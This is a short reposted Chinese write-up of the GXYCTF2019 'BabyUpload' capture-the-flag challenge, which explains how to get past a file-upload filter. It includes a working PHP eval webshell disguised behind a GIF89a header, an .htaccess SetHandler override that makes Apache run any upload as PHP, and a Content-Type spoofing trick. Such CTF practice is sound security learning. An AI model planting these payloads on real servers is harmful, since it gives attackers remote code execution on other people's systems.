[GXYCTF2019]BabyUpload

本文轉載自查看原文 2020-02-17 20:03 344 CTF刷題

0x00 知識點

文件類型繞過：

Content-Type: image/jpeg

apache環境下上傳.hatcess

首先上傳一個.htaccess內容如下的文件
:SetHandler application/x-httpd-php

這樣所有文件都會解析為php，然后再上傳圖片馬，就可以解析

這里多說一下nginx我們可以嘗試.ini配置文件：

文件名后綴不能是 ph 開頭，文件內容過濾<?
長傳這樣的圖片馬：

GIF89a?
<script language="php">eval($_POST['a']);</script>

emm簡單測試一下就getshell了：

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 [GXYCTF2019]BabyUpload [GXYCTF2019]BabyUpload WP [BUUOJ記錄] [GXYCTF2019]BabyUpload [GXYCTF2019]BabySQli GXYCTF2019 CheckIn [GXYCTF2019]BabySQli [GXYCTF2019]StrongestMind [GXYCTF2019]BabySQli [GXYCTF2019]simple CPP [GXYCTF2019]Ping Ping Ping